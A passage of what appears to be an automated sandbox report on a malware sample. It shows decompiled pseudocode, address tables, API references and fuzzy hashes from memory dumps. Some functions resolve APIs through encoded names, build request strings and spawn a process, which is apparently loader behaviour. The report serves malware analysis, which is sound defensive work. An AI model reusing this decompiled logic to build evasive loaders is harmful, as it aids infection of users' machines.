                                                                                                                                                                                                                                						goto L19;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						if(_a8 != 0) {
                                                                                                                                                                                                                                							L19:
                                                                                                                                                                                                                                							E00A853BB(_a4);
                                                                                                                                                                                                                                							if(_v12 == 0 || _v12 == 0x10d2) {
                                                                                                                                                                                                                                								goto L22;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								goto L21;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                						goto L16;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}





















































                                                                                                                                                                                                                                0x00a872a6
                                                                                                                                                                                                                                0x00a872ad
                                                                                                                                                                                                                                0x00a872b5
                                                                                                                                                                                                                                0x00a872ba
                                                                                                                                                                                                                                0x00a872c3
                                                                                                                                                                                                                                0x00a872ce
                                                                                                                                                                                                                                0x00a872d3
                                                                                                                                                                                                                                0x00a872d8
                                                                                                                                                                                                                                0x00a873d7
                                                                                                                                                                                                                                0x00a8738b
                                                                                                                                                                                                                                0x00a8738b
                                                                                                                                                                                                                                0x00a87390
                                                                                                                                                                                                                                0x00a8739b
                                                                                                                                                                                                                                0x00a8739d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8739d
                                                                                                                                                                                                                                0x00a872e2
                                                                                                                                                                                                                                0x00a872e7
                                                                                                                                                                                                                                0x00a872ec
                                                                                                                                                                                                                                0x00a872f1
                                                                                                                                                                                                                                0x00a87301
                                                                                                                                                                                                                                0x00a87304
                                                                                                                                                                                                                                0x00a8730a
                                                                                                                                                                                                                                0x00a87310
                                                                                                                                                                                                                                0x00a87316
                                                                                                                                                                                                                                0x00a87319
                                                                                                                                                                                                                                0x00a8731f
                                                                                                                                                                                                                                0x00a87322
                                                                                                                                                                                                                                0x00a87327
                                                                                                                                                                                                                                0x00a8732b
                                                                                                                                                                                                                                0x00a8732b
                                                                                                                                                                                                                                0x00a87337
                                                                                                                                                                                                                                0x00a87343
                                                                                                                                                                                                                                0x00a87347
                                                                                                                                                                                                                                0x00a87349
                                                                                                                                                                                                                                0x00a8734e
                                                                                                                                                                                                                                0x00a87350
                                                                                                                                                                                                                                0x00a87355
                                                                                                                                                                                                                                0x00a8735a
                                                                                                                                                                                                                                0x00a87367
                                                                                                                                                                                                                                0x00a8736f
                                                                                                                                                                                                                                0x00a87372
                                                                                                                                                                                                                                0x00a87372
                                                                                                                                                                                                                                0x00a8734e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a87339
                                                                                                                                                                                                                                0x00a8733d
                                                                                                                                                                                                                                0x00a87374
                                                                                                                                                                                                                                0x00a87377
                                                                                                                                                                                                                                0x00a87380
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a87380
                                                                                                                                                                                                                                0x00a8733f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8733f
                                                                                                                                                                                                                                0x00a87337

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A87108
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A87158
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A87175
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A871A1
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?), ref: 00A871B3
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A871D4
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?), ref: 00A871E4
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A87212
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A87223
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(01AE9570), ref: 00A87237
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(01AE9570), ref: 00A87255
                                                                                                                                                                                                                                  • Part of subcall function 00A822AB: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,00A8A714,?,01AE95B0), ref: 00A822D6
                                                                                                                                                                                                                                  • Part of subcall function 00A822AB: lstrlen.KERNEL32(?,?,?,00A8A714,?,01AE95B0), ref: 00A822DE
                                                                                                                                                                                                                                  • Part of subcall function 00A822AB: strcpy.NTDLL ref: 00A822F5
                                                                                                                                                                                                                                  • Part of subcall function 00A822AB: lstrcat.KERNEL32(00000000,?), ref: 00A82300
                                                                                                                                                                                                                                  • Part of subcall function 00A822AB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00A8A714,?,01AE95B0), ref: 00A8231D
                                                                                                                                                                                                                                • StrTrimA.SHLWAPI(00000000,00A8C2AC,?,01AE95B0), ref: 00A8728C
                                                                                                                                                                                                                                  • Part of subcall function 00A82629: lstrlen.KERNEL32(01AE9B98,00000000,00000000,770CC740,00A8A73F,00000000), ref: 00A82639
                                                                                                                                                                                                                                  • Part of subcall function 00A82629: lstrlen.KERNEL32(?), ref: 00A82641
                                                                                                                                                                                                                                  • Part of subcall function 00A82629: lstrcpy.KERNEL32(00000000,01AE9B98), ref: 00A82655
                                                                                                                                                                                                                                  • Part of subcall function 00A82629: lstrcat.KERNEL32(00000000,?), ref: 00A82660
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,?), ref: 00A872AD
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 00A872B5
                                                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00A872C3
                                                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00A872C9
                                                                                                                                                                                                                                  • Part of subcall function 00A83037: lstrlen.KERNEL32(?,00000000,01AE9BB8,00000000,00A86F37,01AE9D96,?,?,?,?,?,69B25F44,00000005,00A8D00C), ref: 00A8303E
                                                                                                                                                                                                                                  • Part of subcall function 00A83037: mbstowcs.NTDLL ref: 00A83067
                                                                                                                                                                                                                                  • Part of subcall function 00A83037: memset.NTDLL ref: 00A83079
                                                                                                                                                                                                                                • wcstombs.NTDLL ref: 00A8735A
                                                                                                                                                                                                                                  • Part of subcall function 00A82EA6: SysAllocString.OLEAUT32(?), ref: 00A82EE1
                                                                                                                                                                                                                                  • Part of subcall function 00A853BB: RtlFreeHeap.NTDLL(00000000,00000000,00A812FA,00000000,?,?,00000000), ref: 00A853C7
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?), ref: 00A8739B
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00A873A7
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,01AE95B0), ref: 00A873B3
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?), ref: 00A873BF
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?), ref: 00A873CB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3748877296-1536154274
                                                                                                                                                                                                                                • Opcode ID: 7117540b2d48687d77ff8abde1d79da8fc4de23f55b9810fce37b66c444afcf9
                                                                                                                                                                                                                                • Instruction ID: 994af3fd3f1afe67f9ed8d9ef3490968e6d1101d255d358449eafc61eebdc2da
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7117540b2d48687d77ff8abde1d79da8fc4de23f55b9810fce37b66c444afcf9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66913671900209EFCB11EFA4DD89EAE7BB9FF48350F244065F8059B2A1DB31D912EB61
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DC947(intOrPtr _a4) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				intOrPtr _t25;
                                                                                                                                                                                                                                				intOrPtr* _t26;
                                                                                                                                                                                                                                				intOrPtr _t28;
                                                                                                                                                                                                                                				intOrPtr* _t29;
                                                                                                                                                                                                                                				intOrPtr* _t31;
                                                                                                                                                                                                                                				intOrPtr* _t45;
                                                                                                                                                                                                                                				intOrPtr* _t46;
                                                                                                                                                                                                                                				intOrPtr* _t47;
                                                                                                                                                                                                                                				intOrPtr* _t55;
                                                                                                                                                                                                                                				intOrPtr* _t70;
                                                                                                                                                                                                                                				intOrPtr _t74;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t74 = _a4;
                                                                                                                                                                                                                                				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                                                                                                                                                                                                				if(_t25 != 0 && _t25 != 0x736eb6f8) {
                                                                                                                                                                                                                                					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                                                                                                                                                                                                					if(_t45 != 0 &&  *_t45 == 0) {
                                                                                                                                                                                                                                						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                                                                                                                                                                                                						if(_t46 != 0 &&  *_t46 == 0) {
                                                                                                                                                                                                                                							E736DA293(_t46);
                                                                                                                                                                                                                                							E736DE879( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                                                                                                                                                                                                						if(_t47 != 0 &&  *_t47 == 0) {
                                                                                                                                                                                                                                							E736DA293(_t47);
                                                                                                                                                                                                                                							E736DE977( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						E736DA293( *((intOrPtr*)(_t74 + 0x7c)));
                                                                                                                                                                                                                                						E736DA293( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                                                                                                                                                                                                				if(_t26 != 0 &&  *_t26 == 0) {
                                                                                                                                                                                                                                					E736DA293( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                                                                                                                                                                                                					E736DA293( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                                                                                                                                                                                                					E736DA293( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                                                                                                                                                                                                					E736DA293( *((intOrPtr*)(_t74 + 0x8c)));
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736DCABA( *((intOrPtr*)(_t74 + 0x9c)));
                                                                                                                                                                                                                                				_t28 = 6;
                                                                                                                                                                                                                                				_t55 = _t74 + 0xa0;
                                                                                                                                                                                                                                				_v8 = _t28;
                                                                                                                                                                                                                                				_t70 = _t74 + 0x28;
                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                					if( *((intOrPtr*)(_t70 - 8)) != 0x736eb640) {
                                                                                                                                                                                                                                						_t31 =  *_t70;
                                                                                                                                                                                                                                						if(_t31 != 0 &&  *_t31 == 0) {
                                                                                                                                                                                                                                							E736DA293(_t31);
                                                                                                                                                                                                                                							E736DA293( *_t55);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t28 = _v8;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                                                                                                                                                                                                						_t22 = _t70 - 4; // 0xfffffe87
                                                                                                                                                                                                                                						_t29 =  *_t22;
                                                                                                                                                                                                                                						if(_t29 != 0 &&  *_t29 == 0) {
                                                                                                                                                                                                                                							E736DA293(_t29);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t28 = _v8;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t55 = _t55 + 4;
                                                                                                                                                                                                                                					_t70 = _t70 + 0x10;
                                                                                                                                                                                                                                					_t28 = _t28 - 1;
                                                                                                                                                                                                                                					_v8 = _t28;
                                                                                                                                                                                                                                				} while (_t28 != 0);
                                                                                                                                                                                                                                				return E736DA293(_t74);
                                                                                                                                                                                                                                			}
















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 736DC98B
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE896
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE8A8
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE8BA
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE8CC
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE8DE
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE8F0
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE902
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE914
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE926
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE938
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE94A
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE95C
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE96E
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC980
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: HeapFree.KERNEL32(00000000,00000000,?,736D94E3), ref: 736DA2A9
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: GetLastError.KERNEL32(?,?,736D94E3), ref: 736DA2BB
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC9A2
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC9B7
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC9C2
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC9E4
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC9F7
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA05
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA10
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA48
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA4F
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA6C
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA84
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                                                                                • Opcode ID: 599145fed85b74f97974adef1213f49baa61baba2e9bbbcd209e31af3497c3dc
                                                                                                                                                                                                                                • Instruction ID: f74a755e22aef0896a9b5fa408a0da64e454c7f0919e4df320d9c99cfb1a0f4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 599145fed85b74f97974adef1213f49baa61baba2e9bbbcd209e31af3497c3dc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D315E31A247089FEF129B7ADA40B5673F9BF00710F18452EE49BDB2D0DE75EA508798
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                                                                                                			E00A874A5(void* __eax, void* __ecx) {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                                				void* _v28;
                                                                                                                                                                                                                                				long _v32;
                                                                                                                                                                                                                                				void _v104;
                                                                                                                                                                                                                                				char _v108;
                                                                                                                                                                                                                                				long _t36;
                                                                                                                                                                                                                                				intOrPtr _t40;
                                                                                                                                                                                                                                				intOrPtr _t47;
                                                                                                                                                                                                                                				intOrPtr _t50;
                                                                                                                                                                                                                                				void* _t58;
                                                                                                                                                                                                                                				void* _t68;
                                                                                                                                                                                                                                				intOrPtr* _t70;
                                                                                                                                                                                                                                				intOrPtr* _t71;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t1 = __eax + 0x14; // 0x74183966
                                                                                                                                                                                                                                				_t69 =  *_t1;
                                                                                                                                                                                                                                				_t36 = E00A86856(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                                                                                                                                                                                                				_v8 = _t36;
                                                                                                                                                                                                                                				if(_t36 != 0) {
                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                					return _v8;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E00A8A929( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                                                                                                                                                                                                				_t40 = _v12(_v12);
                                                                                                                                                                                                                                				_v8 = _t40;
                                                                                                                                                                                                                                				if(_t40 == 0 && ( *0xa8d298 & 0x00000001) != 0) {
                                                                                                                                                                                                                                					_v32 = 0;
                                                                                                                                                                                                                                					asm("stosd");
                                                                                                                                                                                                                                					asm("stosd");
                                                                                                                                                                                                                                					asm("stosd");
                                                                                                                                                                                                                                					_v108 = 0;
                                                                                                                                                                                                                                					memset( &_v104, 0, 0x40);
                                                                                                                                                                                                                                					_t47 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                					_t18 = _t47 + 0xa8e3b3; // 0x73797325
                                                                                                                                                                                                                                					_t68 = E00A81EBA(_t18);
                                                                                                                                                                                                                                					if(_t68 == 0) {
                                                                                                                                                                                                                                						_v8 = 8;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t50 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                						_t19 = _t50 + 0xa8e760; // 0x1ae8d08
                                                                                                                                                                                                                                						_t20 = _t50 + 0xa8e0af; // 0x4e52454b
                                                                                                                                                                                                                                						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                                                                                                                                                                                                						if(_t71 == 0) {
                                                                                                                                                                                                                                							_v8 = 0x7f;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_v108 = 0x44;
                                                                                                                                                                                                                                							E00A87020();
                                                                                                                                                                                                                                							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                                                                                                                                                                                                							_push(1);
                                                                                                                                                                                                                                							E00A87020();
                                                                                                                                                                                                                                							if(_t58 == 0) {
                                                                                                                                                                                                                                								_v8 = GetLastError();
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								CloseHandle(_v28);
                                                                                                                                                                                                                                								CloseHandle(_v32);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						HeapFree( *0xa8d270, 0, _t68);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t70 = _v16;
                                                                                                                                                                                                                                				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                                                                                                                                                                                                				E00A853BB(_t70);
                                                                                                                                                                                                                                				goto L12;
                                                                                                                                                                                                                                			}


















                                                                                                                                                                                                                                0x00a87552
                                                                                                                                                                                                                                0x00a87556
                                                                                                                                                                                                                                0x00a875a5
                                                                                                                                                                                                                                0x00a87558
                                                                                                                                                                                                                                0x00a87559
                                                                                                                                                                                                                                0x00a87560
                                                                                                                                                                                                                                0x00a87579
                                                                                                                                                                                                                                0x00a8757b
                                                                                                                                                                                                                                0x00a8757f
                                                                                                                                                                                                                                0x00a87586
                                                                                                                                                                                                                                0x00a875a0
                                                                                                                                                                                                                                0x00a87588
                                                                                                                                                                                                                                0x00a87591
                                                                                                                                                                                                                                0x00a87596
                                                                                                                                                                                                                                0x00a87596
                                                                                                                                                                                                                                0x00a87586
                                                                                                                                                                                                                                0x00a875b4
                                                                                                                                                                                                                                0x00a875b4
                                                                                                                                                                                                                                0x00a8752c
                                                                                                                                                                                                                                0x00a875c3
                                                                                                                                                                                                                                0x00a875cc
                                                                                                                                                                                                                                0x00a875d0
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A86856: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00A874C1,?,00000001,?,?,00000000,00000000), ref: 00A8687B
                                                                                                                                                                                                                                  • Part of subcall function 00A86856: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00A8689D
                                                                                                                                                                                                                                  • Part of subcall function 00A86856: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00A868B3
                                                                                                                                                                                                                                  • Part of subcall function 00A86856: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00A868C9
                                                                                                                                                                                                                                  • Part of subcall function 00A86856: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00A868DF
                                                                                                                                                                                                                                  • Part of subcall function 00A86856: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00A868F5
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A8750F
                                                                                                                                                                                                                                  • Part of subcall function 00A81EBA: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,00A87528,73797325), ref: 00A81ECB
                                                                                                                                                                                                                                  • Part of subcall function 00A81EBA: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00A81EE5
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(4E52454B,01AE8D08,73797325), ref: 00A87545
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00A8754C
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 00A875B4
                                                                                                                                                                                                                                  • Part of subcall function 00A87020: GetProcAddress.KERNEL32(36776F57,00A86B1C), ref: 00A8703B
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000001), ref: 00A87591
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00A87596
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000001), ref: 00A8759A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                                                                                                                                                                                                • String ID: Uxt$@MxtNxt
                                                                                                                                                                                                                                • API String ID: 3075724336-2342693527
                                                                                                                                                                                                                                • Opcode ID: 8b95e27fd347eba5c3a4174b63b52238c5e592f5790d22ad1ebf65057734a8c8
                                                                                                                                                                                                                                • Instruction ID: 6cac216c784218e496cbbf9698459597fa1f7a64cc6a439e89610484f48985d7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b95e27fd347eba5c3a4174b63b52238c5e592f5790d22ad1ebf65057734a8c8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 803121B2804208EFDB11FFE4DD89E9EBBBCEB48354F204465F506A7161D7709D459BA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                			E736D9B4D(void* __ebx, void* __edi, void* __esi, char _a4) {
                                                                                                                                                                                                                                				void* _v5;
                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                                				void* __ebp;
                                                                                                                                                                                                                                				char _t55;
                                                                                                                                                                                                                                				char _t61;
                                                                                                                                                                                                                                				void* _t67;
                                                                                                                                                                                                                                				intOrPtr _t68;
                                                                                                                                                                                                                                				void* _t72;
                                                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t73 = __esi;
                                                                                                                                                                                                                                				_t72 = __edi;
                                                                                                                                                                                                                                				_t67 = __ebx;
                                                                                                                                                                                                                                				_t36 = _a4;
                                                                                                                                                                                                                                				_t68 =  *_a4;
                                                                                                                                                                                                                                				_t77 = _t68 - 0x736e1c18;
                                                                                                                                                                                                                                				if(_t68 != 0x736e1c18) {
                                                                                                                                                                                                                                					E736DA293(_t68);
                                                                                                                                                                                                                                					_t36 = _a4;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736DA293( *((intOrPtr*)(_t36 + 0x3c)));
                                                                                                                                                                                                                                				E736DA293( *((intOrPtr*)(_a4 + 0x30)));
                                                                                                                                                                                                                                				E736DA293( *((intOrPtr*)(_a4 + 0x34)));
                                                                                                                                                                                                                                				E736DA293( *((intOrPtr*)(_a4 + 0x38)));
                                                                                                                                                                                                                                				E736DA293( *((intOrPtr*)(_a4 + 0x28)));
                                                                                                                                                                                                                                				E736DA293( *((intOrPtr*)(_a4 + 0x2c)));
                                                                                                                                                                                                                                				E736DA293( *((intOrPtr*)(_a4 + 0x40)));
                                                                                                                                                                                                                                				E736DA293( *((intOrPtr*)(_a4 + 0x44)));
                                                                                                                                                                                                                                				E736DA293( *((intOrPtr*)(_a4 + 0x360)));
                                                                                                                                                                                                                                				_v16 =  &_a4;
                                                                                                                                                                                                                                				_t55 = 5;
                                                                                                                                                                                                                                				_v12 = _t55;
                                                                                                                                                                                                                                				_v20 = _t55;
                                                                                                                                                                                                                                				_push( &_v12);
                                                                                                                                                                                                                                				_push( &_v16);
                                                                                                                                                                                                                                				_push( &_v20);
                                                                                                                                                                                                                                				E736D9995(_t67, _t72, _t73, _t77);
                                                                                                                                                                                                                                				_v16 =  &_a4;
                                                                                                                                                                                                                                				_t61 = 4;
                                                                                                                                                                                                                                				_v20 = _t61;
                                                                                                                                                                                                                                				_v12 = _t61;
                                                                                                                                                                                                                                				_push( &_v20);
                                                                                                                                                                                                                                				_push( &_v16);
                                                                                                                                                                                                                                				_push( &_v12);
                                                                                                                                                                                                                                				return E736D99F6(_t67, _t72, _t73, _t77);
                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                0x736d9bca
                                                                                                                                                                                                                                0x736d9bd5
                                                                                                                                                                                                                                0x736d9bdd
                                                                                                                                                                                                                                0x736d9bde
                                                                                                                                                                                                                                0x736d9be1
                                                                                                                                                                                                                                0x736d9be7
                                                                                                                                                                                                                                0x736d9beb
                                                                                                                                                                                                                                0x736d9bef
                                                                                                                                                                                                                                0x736d9bf0
                                                                                                                                                                                                                                0x736d9bfa
                                                                                                                                                                                                                                0x736d9c00
                                                                                                                                                                                                                                0x736d9c01
                                                                                                                                                                                                                                0x736d9c04
                                                                                                                                                                                                                                0x736d9c0a
                                                                                                                                                                                                                                0x736d9c0e
                                                                                                                                                                                                                                0x736d9c12
                                                                                                                                                                                                                                0x736d9c1b

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
